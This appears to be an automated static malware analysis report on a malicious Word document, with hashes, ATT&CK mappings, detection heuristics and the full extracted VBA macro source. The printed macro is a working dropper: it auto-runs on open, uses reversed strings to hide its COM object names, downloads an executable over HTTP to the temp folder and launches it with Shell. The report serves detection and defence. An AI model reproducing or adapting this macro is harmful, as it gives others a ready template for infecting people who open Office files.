Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 882a2b15f14bf5fe…

MALICIOUS

Office (OOXML)

Size: 25.5 KB
Created: 2015-12-01 15:53:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2020-02-04
MD5: 8699bdf1be8fc18bd0265cbe1eaeddeb
SHA-1: 36f659e73c071fe049b8e4e44ccba32ac3e42638
SHA-256: 882a2b15f14bf5fe579e7ca42e4b730923c6a3a755284074ef3efe42dd6a6e0d
Risk score: 306

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is an OOXML document containing obfuscated VBA macros. The macros use the AutoOpen and Workbook_Open entry points to execute, and heuristics indicate they are designed to download a second-stage payload over HTTP, write it to disk and execute it. The CreateObject and Shell calls in the source support this assessment, and the ClamAV detection 'Doc.Dropper.Agent-6387882-0' is consistent with the same dropper functionality.

Heuristics (10)

  • ClamAV: Doc.Dropper.Agent-6387882-0 (critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6387882-0
  • VBA project inside OOXML (medium, 7 related findings) [OOXML_VBA]
    Document contains a VBA project: VBA macros present
  • Potential Shell call in VBA (critical) [OLE_VBA_SHELL]
    Potential Shell call in VBA
    Matched line in script:
        Shell oGdyeJdhsdd.bhjsdfvcjdds
  • VBA downloads and writes a file to disk (critical) [OLE_VBA_HTTP_DROP_EXEC]
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
        xxxcvcxvb.Write jfytwjhdb.responseBody
  • CreateObject call (high) [OLE_VBA_CREATEOBJ]
    CreateObject call
    Matched line in script:
        Set dsfgty = CreateObject(jduyewiskd.IdjcTrsj)
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
    Matched line in script:
        Sub AutoOpen()
  • Workbook_Open macro (low) [OLE_VBA_WBOPEN]
    Workbook_Open macro
    Matched line in script:
        Sub Workbook_Open()
  • Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]
    Environ() call (env variable access)
    Matched line in script:
        nHdiPwTgFsd = Environ(jduyewiskd.uYtbdTsc) & Chr$(47) & Chr$(115) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(100) & Chr$(101) & Chr$(114) + oGdyeJdhsdd.TextBox3
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7692 bytes
SHA-256: b0698860c72c6e9b366135ab6d8116217aaec9ec9d74de7bc9f4b0d701d6c2e5
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub JSUrgGsyv()
'tmpo41

Dim JdgReyjd As Integer

Dim ShdwdjJds As Integer
ShdwdjJds = 6
Do While ShdwdjJds < 59
DoEvents: ShdwdjJds = ShdwdjJds + 1
Loop

JdgReyjd = 4
Do While JdgReyjd < 81

Dim uYetBsjfhs As Integer
uYetBsjfhs = 8
Do While uYetBsjfhs < 72
DoEvents: uYetBsjfhs = uYetBsjfhs + 1
Loop

DoEvents: JdgReyjd = JdgReyjd + 1

Loop


Dim PsiosJstwvd As Integer
PsiosJstwvd = 2
Do While PsiosJstwvd < 25
DoEvents: PsiosJstwvd = PsiosJstwvd + 1
Loop

UIkcdidYs
End Sub
Sub AutoOpen()

Dim iUwuUWuxc As Integer

Dim pojxwSdc As Integer
pojxwSdc = 4
Do While pojxwSdc < 77
DoEvents: pojxwSdc = pojxwSdc + 1
Loop

iUwuUWuxc = 6
Do While iUwuUWuxc < 29

Dim FoewfdSy As Integer
FoewfdSy = 9
Do While FoewfdSy < 34
DoEvents: FoewfdSy = FoewfdSy + 1
Loop

DoEvents: iUwuUWuxc = iUwuUWuxc + 1

Loop


Dim AdhsajhEc As Integer
AdhsajhEc = 7
Do While AdhsajhEc < 89
DoEvents: AdhsajhEc = AdhsajhEc + 1
Loop

    JSUrgGsyv
End Sub
Sub Workbook_Open()

Dim IowxJDdsr As Integer

Dim bGdkaJjdsd As Integer
bGdkaJjdsd = 4
Do While bGdkaJjdsd < 71
DoEvents: bGdkaJjdsd = bGdkaJjdsd + 1
Loop

IowxJDdsr = 5
Do While IowxJDdsr < 75

Dim wSfowpcD As Integer
wSfowpcD = 7
Do While wSfowpcD < 88
DoEvents: wSfowpcD = wSfowpcD + 1
Loop

DoEvents: IowxJDdsr = IowxJDdsr + 1
Loop


Dim iAcvpaJHdc As Integer
iAcvpaJHdc = 6
Do While iAcvpaJHdc < 56
DoEvents: iAcvpaJHdc = iAcvpaJHdc + 1
Loop

    JSUrgGsyv
End Sub


Attribute VB_Name = "trekdddjvjb"
Public Function oPlKtRebGf()
hyyuejkjs = "/x16"
yyeidsadf = "56/f"
iuyhgdfsdf = oGdyeJdhsdd.TextBox1
yeuijjffsa = "dgjbhis75.exe"
oPlKtRebGf = oGdyeJdhsdd.TextBox4 + iuyhgdfsdf + hyyuejkjs + yyeidsadf + yeuijjffsa
End Function




Attribute VB_Name = "oerdkaksnc"
Public Function nHdiPwTgFsd()

nHdiPwTgFsd = Environ(jduyewiskd.uYtbdTsc) & Chr$(47) & Chr$(115) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(100) & Chr$(101) & Chr$(114) + oGdyeJdhsdd.TextBox3

End Function


Attribute VB_Name = "jduyewiskd"
Public Function uYtbdTsc()
 uYtbdTsc = StrReverse("PMET")
End Function
Public Function IdjcTrsj()
IdjcTrsj = StrReverse("PTTHLMX.tfosorciM")
End Function
Public Function ThWockSv()
ThWockSv = StrReverse("maertS.BDODA")
End Function


Attribute VB_Name = "aIuhYqZk"
Sub UIkcdidYs()
 
Set dsfgty = CreateObject(jduyewiskd.IdjcTrsj)

Dim uehdbcxsd As Integer
uehdbcxsd = 7
Do While uehdbcxsd < 66
DoEvents: uehdbcxsd = uehdbcxsd + 1
Loop

dsfgty.Open StrReverse("TSOP"), trekdddjvjb.oPlKtRebGf, False

Dim kiwqazbcf As Integer
kiwqazbcf = 5
Do While kiwqazbcf < 78
DoEvents: kiwqazbcf = kiwqazbcf + 1
Loop

dsfgty.send

Dim ieywhdcba As Integer
ieywhdcba = 9
Do While ieywhdcba < 38
DoEvents: ieywhdcba = ieywhdcba + 1
Loop

uwopdhftes dsfgty

Dim tRekfhgwv As Integer
tRekfhgwv = 9
Do While tRekfhgwv < 82
DoEvents: tRekfhgwv = tRekfhgwv + 1
Loop

Shell oGdyeJdhsdd.bhjsdfvcjdds
End Sub

Function uwopdhftes(ByVal jfytwjhdb)

    Set xxxcvcxvb = CreateObject(jduyewiskd.ThWockSv)

Dim OpHfreohd As Integer
OpHfreohd = 4
Do While OpHfreohd < 54
DoEvents: OpHfreohd = OpHfreohd + 1
Loop

    xxxcvcxvb.Open

Dim IuwSjskwq As Integer
IuwSjskwq = 4
Do While IuwSjskwq < 67
DoEvents: IuwSjskwq = IuwSjskwq + 1
Loop

    xxxcvcxvb.Type = 2 - 1

Dim jHewysLd As Integer
jHewysLd = 7
Do While jHewysLd < 84
DoEvents: jHewysLd = jHewysLd + 1
Loop

    xxxcvcxvb.Write jfytwjhdb.responseBody

Dim oYeBsdhd As Integer
oYeBsdhd = 4
Do While oYeBsdhd < 76
DoEvents: oYeBsdhd = oYeBsdhd + 1
Loop

    xxxcvcxvb.SaveToFile oerdkaksnc.nHdiPwTgFsd, 3 - 1

Dim YrtGfdvzw As Integer
YrtGfdvzw = 6
Do While YrtGfdvzw < 63
DoEvents: YrtGfdvzw = YrtGfdvzw + 1
Loop

    xxxcvcxvb.Close

End Function


Attribute VB_Name = "oGdyeJdhsdd"
Attribute VB_Base = "0{A2FE2FBE-A473-40D1-BACD-006B5703C3FF}{E02A56A1-AB97-4A7D-84A7-6B335CEA197F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class4"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class6"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class7"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class8"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class9"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class10"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 45056 bytes
SHA-256: 7a2de65114aee78cc5c35c165e912f21b986d09eb51dd727b88fdd8e5f597fc2